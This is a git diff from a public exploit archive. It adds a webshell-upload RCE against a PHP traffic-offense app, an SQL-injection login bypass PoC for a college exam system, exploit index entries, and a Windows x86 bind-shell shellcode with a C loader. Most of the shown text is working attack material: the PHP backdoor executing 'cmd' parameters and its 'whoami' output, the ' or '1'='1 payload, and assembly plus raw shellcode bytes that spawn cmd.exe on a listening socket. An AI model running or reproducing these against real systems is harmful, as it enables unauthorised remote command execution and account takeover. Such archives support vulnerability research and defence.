+-----------------------------339921602532596419562348365833--
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:21:35 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+1
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php
+
+## Example 3
+
+# Webshell as photo in driver list page
+
+# Request
+
+POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
+Content-Length: 2148
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
+Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="license_id_no"
+
+vvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="lastname"
+
+vvvvvvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="firstname"
+
+vvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="middlename"
+
+vvvvvvvvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="dob"
+
+2021-10-07
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="present_address"
+
+vvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="permanent_address"
+
+vvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="civil_status"
+
+Single
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="nationality"
+
+vvvvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="contact"
+
+vvvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="license_type"
+
+Student
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="image_path"
+
+
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
+Content-Type: application/octet-stream
+
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->
+
+-----------------------------12210274961293066124133837204--
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:35:21 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 20
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+{"status":"success"}
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# Request to webshell
+
+GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:39:15 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Access-Control-Allow-Origin: *
+Content-Length: 95
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<pre>desktop-uhrf0c6\hubert
+</pre>
\ No newline at end of file
diff --git a/exploits/php/webapps/50390.txt b/exploits/php/webapps/50390.txt
new file mode 100644
index 000000000..d7180f0ca
--- /dev/null
+++ b/exploits/php/webapps/50390.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
+# Date: 07.10.2021
+# Exploit Author: Mevlüt Yılmaz
+# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Simple Online College Entrance Exam System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.
+
+Steps To Reproduce:
+1 - Go to the login page http://localhost/entrance_exam/admin/login.php
+2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
+3 - Click on "Login" button and you are logged in as administrator.
+
+PoC
+
+POST /entrance_exam/Actions.php?a=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 45
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/entrance_exam/admin/login.php
+Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n
+
+username=admin'+or+'1'%3D'1&password=anything
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8ad474693..e5b9a8e7e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11395,6 +11395,7 @@ id,file,description,date,author,type,platform,port
 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
 50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
+50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44495,4 +44496,9 @@ id,file,description,date,author,type,platform,port
 50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
 50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
 50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
-50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal",1970-01-01,"Lucas Souza",webapps,multiple,
+50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple,
+50386,exploits/php/webapps/50386.txt,"Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting",1970-01-01,"Yash Mahajan",webapps,php,
+50387,exploits/php/webapps/50387.txt,"Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)",1970-01-01,snup,webapps,php,
+50388,exploits/php/webapps/50388.txt,"Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)",1970-01-01,snup,webapps,php,
+50389,exploits/php/webapps/50389.txt,"Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)",1970-01-01,snup,webapps,php,
+50390,exploits/php/webapps/50390.txt,"Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mevlüt Yılmaz",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index d7c2e1ee8..aeb0cba5d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1043,3 +1043,4 @@ id,file,description,date,author,type,platform
 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
+50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
diff --git a/shellcodes/windows_x86/50384.c b/shellcodes/windows_x86/50384.c
new file mode 100644
index 000000000..c824c7340
--- /dev/null
+++ b/shellcodes/windows_x86/50384.c
@@ -0,0 +1,324 @@
+; Name: Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
+; Author: h4pp1n3ss
+; Date: Wed 10/06/2021
+; Tested on: Microsoft Windows [Version 10.0.19042.1237]
+
+; Description:
+; This a bind tcp shellcode that open a listen socket on 0.0.0.0 and port 1337. In order to accomplish this task the shellcode uses
+; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
+; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.
+
+ start:                            ;
+
+   mov   ebp, esp                  ;
+   add   esp, 0xfffff9f0           ; Avoid null-bytes and stack clobbering
+
+ find_kernel32:
+
+    xor   ecx, ecx                  ; ECX = Null
+    mov   esi,fs:[ecx+0x30]         ; ESI = &(PEB) ([FS:0x30])
+    mov   esi,[esi+0x0C]            ; ESI = PEB->Ldr
+    mov   esi,[esi+0x1C]            ; ESI = PEB->Ldr.InInitOrder
+
+ next_module:                       ;
+
+    mov   ebx, [esi+0x08]           ; EBX = InInitOrder[X].base_address
+    mov   edi, [esi+0x20]           ; EDI = InInitOrder[X].module_name
+    mov   esi, [esi]                ; ESI = InInitOrder[X].flink (next module)
+    cmp   [edi+12*2], cx            ; (unicode) module_name[12] == 0x00 / we found kernel32.dll?
+    jne   next_module               ; No: try next module
+
+ find_function_shorten:             ;
+
+   jmp find_function_shorten_bnc    ; short jump
+
+ find_function_ret:                 ;
+
+    pop esi                         ; ESI = POP return addres
+    mov   [ebp+0x04], esi           ; Save find_function address for later usage
+    jmp resolve_symbols_kernel32    ;
+
+ find_function_shorten_bnc:         ;
+    call find_function_ret          ; Call fund_function_ret PUSH ret address into the stack
+
+ find_function:                     ;
+
+    pushad                          ; Save all registers
+    mov   eax, [ebx+0x3c]           ; Offset of PE signature
+    mov   edi, [ebx+eax+0x78]       ; Export Table Directory RVA
+    add   edi, ebx                  ; Export Table Directory VMA
+    mov   ecx, [edi+0x18]           ; NumberOfNames
+    mov   eax, [edi+0x20]           ; AddressOfNames RVA
+    add   eax, ebx                  ; AddresOfNames VMA
+    mov   [ebp-4], eax              ; Save AddressOfName VMA for later usage
+
+ find_function_loop:                ;
+    jecxz find_function_finished    ; Jump to the end if ECX is 0
+    dec   ecx                       ; Decrement our counter
+    mov   eax, [ebp-4]              ; Restore AddressOfNames VMA
+    mov   esi, [eax+ecx*4]          ; Get the RVA of the symbol name
+    add   esi, ebx                  ; Set ESI to the VMA of the current symbol name
+
+ compute_hash:                      ;
+    xor   eax, eax                  ; EAX = Null
+    cdq                             ; Null EDX
+    cld                             ; Clear direction flag
+
+ compute_hash_again:
+    lodsb                           ; Load the next bytes from ESI into al
+    test  al, al                    ; Check for Null terminator
+    jz    compute_hash_finished     ; If the ZF is set, we've hit the NULL term
+    ror   edx, 0x0d                 ; Rotate edx 13 bits to the right
+    add   edx, eax                  ; Add the new byte to the accumulator
+    jmp   compute_hash_again        ; Next iteration
+
+ compute_hash_finished:             ;
+
+ find_function_compare:
+    cmp   edx, [esp+0x24]           ; Compare the computed hash with the requested hash
+    jnz   find_function_loop        ; If it doesn't match go back to find_function_loop
+    mov   edx, [edi+0x24]           ; AddressOfNameOrdinals RVA
+    add   edx, ebx                  ; AddressOfNameOrdinals VMA
+    mov   cx,  [edx+2*ecx]          ; Extrapolate the function's ordinal
+    mov   edx, [edi+0x1c]           ; AddressOfFunctions RVA
+    add   edx, ebx                  ; AddressOfFunctions VMA
+    mov   eax, [edx+4*ecx]          ; Get the function RVA
+    add   eax, ebx                  ; Get the function VMA
+    mov   [esp+0x1c], eax           ; Overwrite stack version of eax from pushad
+
+ find_function_finished:            ;
+    popad                           ; Restore registers
+    ret                             ;
+
+ resolve_symbols_kernel32:          ;
+    push 0x78b5b983                 ; TerminateProcess hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x10], eax           ; Save TerminateProcess address for later usage
+    push 0xec0e4e8e                 ; LoadLibraryA hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x14], eax           ; Save LoadLibraryA address for later usage
+    push 0x16b3fe72                 ; CreateProcessA hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x18], eax           ; Save CreateProcessA address for later usage
+
+ load_ws2_32:                       ;
+    xor   eax, eax                  ; EAX = Null
+    mov ax, 0x6c6c                  ; EAX = 0x6c6c
+    push eax                        ; ESP = "ll"
+    push dword 0x642e3233           ; ESP = "32.dll"
+    push dword 0x5f327377           ; ESP = "ws2_32.dll"
+    push  esp                       ; ESP = &("ws2_32.dll")
+    call dword  [ebp+0x14]          ; Call LoadLibraryA
+
+resolve_symbols_ws2_32:
+    mov   ebx, eax                  ; Move the base address of ws2_32.dll to EBX
+    push 0x3bfcedcb                 ; WSAStartup hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x1C], eax           ; Save WSAStartup address for later usage
+    push 0xadf509d9                 ; WSASocketA hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x20], eax           ; Save WSASocketA address for later usage
+    push 0xc7701aa4                 ; Bind hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x24], eax           ; Save Bind address for later usage
+    push 0xe92eada4                 ; listen hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x28], eax           ; Save listen address for later usage
+    push 0x9f5b7976                 ; WSAGetLastError hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x32], eax           ; Save WSAGetLastError address for later usage
+    push 0x498649e5                 ; accept hash
+    call dword  [ebp+0x04]          ; Call find_function
+    mov   [ebp+0x36], eax           ; Save acccept address for later usage
+
+ call_wsastartup:                   ;
+    mov   eax, esp                  ; Move ESP to EAX
+    mov   cx, 0x590                 ; Move 0x590 to CX
+    sub   eax, ecx                  ; Substract CX from EAX to avoid overwriting the structure later
+    push  eax                       ; Push lpWSAData
+    xor   eax, eax                  ; EAX = Null
+    mov   ax, 0x0202                ; Move version to AX
+    push  eax                       ; Push wVersionRequired (0x00000202)
+    call dword  [ebp+0x1C]          ; Call WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
+
+ call_wsasocketa:                   ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL )
+    xor   eax,  eax                 ; EAX = Null
+    push  eax                       ; Push dwFlags
+    push  eax                       ; Push g
+    push  eax                       ; Push lpProtocolInfo
+    mov   al, 0x06                  ; Move AL, IPPROTO_TCP
+    push  eax                       ; Push protocol
+    sub   al, 0x05                  ; Substract 0x05 from AL, AL = 0x01
+    push  eax                       ; Push type
+    inc   eax                       ; Increase EAX, EAX = 0x02
+    push  eax                       ; Push af
+    call dword  [ebp+0x20]          ; Call WSASocketA(2,1,6,0,0,0)
+
+ create_sockaddr_in_struct:         ; sockaddr_in {AF_INET = 2; p1337 = 0x3905; INADDR_ANY = 0x5D00A8C0}
+    mov   esi, eax                  ; Move the SOCKET descriptor to ESI
+    xor   eax, eax                  ; EAX = Null
+    push eax                        ; Push sin_addr (any address 0.0.0.0)
+    mov ax, 0x3905                  ; Move the sin_port (example: 1337) to AX (EAX = 0x00003905)
+    shl   eax, 0x10                 ; Left shift EAX by 0x10 bytes (EAX = 0x39050000)
+    add   ax, 0x02                  ; Add 0x02 (AF_INET) to AX
+    push  eax                       ; Push sin_port & sin_family
+    push  esp                       ; Push pointer to the sockaddr_in structure
+    pop   edi                       ; EDI = &(sockaddr_in)
+
+ call_bind:                         ; bind(SOCKET *s = ESI, const sockaddr *addr = EDI, int  namelen = 0x16)
+    xor   eax, eax                  ; EAX = Null
+    add   al, 0x16                  ; Set AL to 0x16
+    push  eax                       ; Push namelen
+    push  edi                       ; Push *addr
+    push  esi                       ; Push s
+    call dword  [ebp+0x24]          ; Call bind
+
+ call_wsagetlaserror:               ; WSAGetLastError() (just for debugging purpouse)
+    call dword  [ebp+0x32]          ; Call WSAGetLastError
+
+ call_listen:                       ;
+    xor  eax, eax                   ; EAX = Null
+    push  eax                       ; Push backlog
+    push  esi                       ; Push s
+    call dword  [ebp+0x28]          ; Call WS2_32!listen
+
+ call_accept:                       ; accept( SOCKET s, sockaddr *addr, int *addrlen)
+    xor  eax, eax                   ; EAX = Null
+    push  eax                       ; Push *addrlen (optional)
+    push  eax                       ; Push *addr    (optional)
+    push  esi                       ; Push socket HANDLE from WSASocketA()
+    call dword  [ebp+0x36]          ; Call accept(SOCKET s ,Null, Null)
+
+ create_startupinfoa:               ;
+    mov   esi, eax                  ; Save Handle returned from accept() into ESI
+    push  esi                       ; Push hStdError
+    push  esi                       ; Push hStdOutput
+    push  esi                       ; Push hStdInput
+    xor   eax, eax                  ; EAX = Null
+    push  eax                       ; Push lpReserved2
+    push  eax                       ; Push cbReserved2 & wShowWindow
+    mov   al, 0x80                  ; Move 0x80 to AL
+    xor   ecx, ecx                  ; EAX = Null
+    mov   cl, 0x80                  ; Move 0x80 to CL
+    add   eax, ecx                  ; Set EAX to 0x100
+    push  eax                       ; Push dwFlags
+    xor   eax, eax                  ; EAX = Null
+    push  eax                       ; Push dwFillAttribute
+    push  eax                       ; Push dwYCountChars
+    push  eax                       ; Push dwXCountChars
+    push  eax                       ; Push dwYSize
+    push  eax                       ; Push dwXSize
+    push  eax                       ; Push dwY
+    push  eax                       ; Push dwX
+    push  eax                       ; Push lpTitle
+    push  eax                       ; Push lpDesktop
+    push  eax                       ; Push lpReserved
+    mov   al, 0x44                  ; Move 0x44 to AL
+    push  eax                       ; Push cb
+    push  esp                       ; Push pointer to the STARTUPINFOA structure
+    pop   edi                       ; Store pointer to STARTUPINFOA in EDI
+
+ create_cmd_string:                 ;
+    mov   eax, 0xff9a879b           ; Move 0xff9a879b into EAX
+    neg   eax                       ; Negate EAX, EAX = 00657865
+    push  eax                       ; Push part of the "cmd.exe" string
+    push  0x2e646d63                ; Push the remainder of the "cmd.exe" string
+    push  esp                       ; Push pointer to the "cmd.exe" string
+    pop   ebx                       ; Store pointer to the "cmd.exe" string in EBX
+
+ call_createprocessa:               ;
+    mov   eax, esp                  ; Move ESP to EAX
+    xor   ecx, ecx                  ; ECX = Null
+    mov   cx, 0x390                 ; Move 0x390 to CX
+    sub   eax, ecx                  ; Substract CX from EAX to avoid overwriting the structure later
+    push  eax                       ; Push lpProcessInformation
+    push  edi                       ; Push lpStartupInfo
+    xor   eax, eax                  ; EAX = Null
+    push  eax                       ; Push lpCurrentDirectory
+    push  eax                       ; Push lpEnvironment
+    push  eax                       ; Push dwCreationFlags
+    inc   eax                       ; Increase EAX, EAX = 0x01 (TRUE)
+    push  eax                       ; Push bInheritHandles
+    dec   eax                       ; EAX = Null
+    push  eax                       ; Push lpThreadAttributes
+    push  eax                       ; Push lpProcessAttributes
+    push  ebx                       ; Push lpCommandLine
+    push  eax                       ; Push lpApplicationName
+    call dword  [ebp+0x18]          ; Call CreateProcessA
+
+ call_terminate_process:            ;
+    xor  eax, eax                   ; EAX = Null
+    push  eax                       ; uExitCode
+    push  0xffffffff                ; HANDLE hProcess
+    call dword  [ebp+0x04]          ; Call TerminateProcess
+
+
+[*]================================= POC =============================== [*]
+
+
+
+/*
+
+ Shellcode runner author: reenz0h (twitter: @sektor7net)
+
+*/
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+// nasm -f win32 shellcode.asm -o shellcode.o
+// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+
+
+unsigned char payload[] =
+		"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
+		"\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
+		"\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
+		"\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
+		"\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
+		"\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
+		"\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
+		"\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e\x0e\xec\xff\x55"
+		"\x04\x89\x45\x14\x68\x72\xfe\xb3\x16\xff\x55\x04\x89\x45\x18\x31\xc0\x66"
+		"\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x55\x14"
+		"\x89\xc3\x68\xcb\xed\xfc\x3b\xff\x55\x04\x89\x45\x1c\x68\xd9\x09\xf5\xad"
+		"\xff\x55\x04\x89\x45\x20\x68\xa4\x1a\x70\xc7\xff\x55\x04\x89\x45\x24\x68"
+		"\xa4\xad\x2e\xe9\xff\x55\x04\x89\x45\x28\x68\x76\x79\x5b\x9f\xff\x55\x04"
+		"\x89\x45\x32\x68\xe5\x49\x86\x49\xff\x55\x04\x89\x45\x36\x89\xe0\x66\xb9"
+		"\x90\x05\x29\xc8\x50\x31\xc0\x66\xb8\x02\x02\x50\xff\x55\x1c\x31\xc0\x50"
+		"\x50\x50\xb0\x06\x50\x2c\x05\x50\x40\x50\xff\x55\x20\x89\xc6\x31\xc0\x50"
+		"\x66\xb8\x05\x39\xc1\xe0\x10\x66\x83\xc0\x02\x50\x54\x5f\x31\xc0\x04\x16"
+		"\x50\x57\x56\xff\x55\x24\xff\x55\x32\x31\xc0\x50\x56\xff\x55\x28\x31\xc0"
+		"\x50\x50\x56\xff\x55\x36\x89\xc6\x56\x56\x56\x31\xc0\x50\x50\xb0\x80\x31"
+		"\xc9\xb1\x80\x01\xc8\x50\x31\xc0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
+		"\xb0\x44\x50\x54\x5f\xb8\x9b\x87\x9a\xff\xf7\xd8\x50\x68\x63\x6d\x64\x2e"
+		"\x54\x5b\x89\xe0\x31\xc9\x66\xb9\x90\x03\x29\xc8\x50\x57\x31\xc0\x50\x50"
+		"\x50\x40\x50\x48\x50\x50\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55"
+		"\x04";
+
+unsigned int payload_len = 415;
+
+int main(void) {
+
+	void * exec_mem;
+	BOOL rv;
+	HANDLE th;
+	DWORD oldprotect = 0;
+
+	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+	RtlMoveMemory(exec_mem, payload, payload_len);
+
+	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+
+	printf("Shellcode Length:  %d\n", strlen(payload));
+
+	if ( rv != 0 ) {
+		th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
+		WaitForSingleObject(th, -1);
+
+	}
+
+	return 0;
+}
\ No newline at end of file